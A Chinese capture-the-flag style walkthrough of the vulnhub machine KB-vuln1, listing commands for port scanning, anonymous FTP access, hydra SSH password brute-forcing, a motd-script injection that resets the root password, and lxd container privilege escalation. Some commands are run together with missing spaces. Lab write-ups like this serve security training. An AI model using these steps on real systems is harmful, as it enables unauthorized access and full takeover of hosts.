实验环境
kali攻击机ip:192.168.56.116
KB-vuln1靶机ip:192.168.56.147
知识点及工具
nmap扫描
ftp服务匿名访问
hydra爆破
lxd提权
靶机难度
简单
开始渗透
首先第一步对目标靶机网络端口扫描
nmap –A –p- 192.168.56.147
扫描结果目标服务开放了21(ftp),22(ssh),80 (http)端口
ftp看着是可以匿名访问,利用一下,结果看不到信息,应该还会有隐藏文件
ftp://192.168.56.147
有个历史文件,下载下来看看
看记录应该是修改了motd文件,接着看看其他信息吧,访问了80端口,目录扫描了都未发现新情况
页面也没有登录界面,于是尝试了ssh,很快就爆破出来了
hydra –l sysadmin –P /usr/share/wordlists/rockyou.txt ssh://192.168.56.147
登录靶机,之前在ftp里面有个bash_history文件,然后直奔motd文件,发现可编辑,而且root权限。(你也可以反弹shell)
echo "echo 'root:mrlee' | sudo chpasswd" >> 00-header
退出,重新登录,切换root用户
看着sysadmin还属于lxd组用户,继续尝试lxd提权
https://www.freebuf.com/articles/network/216803.html
kali机编译
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
运行完上述命令之后,会在当前目录下创建一个xxx.tar.gz文件,然后将其发送至目标靶机系统。
靶机
文件传完成之后,就可以将其以镜像的形式添加进LXD了
lxc image import ./apline-v3.12-x86_64-20201007_2053.tar.gz--alias myimage
查看容器列表里有没有添加成功
lxc image list
开始配置
lxd init(一路回车)
lxc init myimage ignite -csecurity.privileged=true
lxc config device add ignite mydevice disksource=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
本文始发于微信公众号(MrLee 小师父):vulnhub-KB-vuln1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论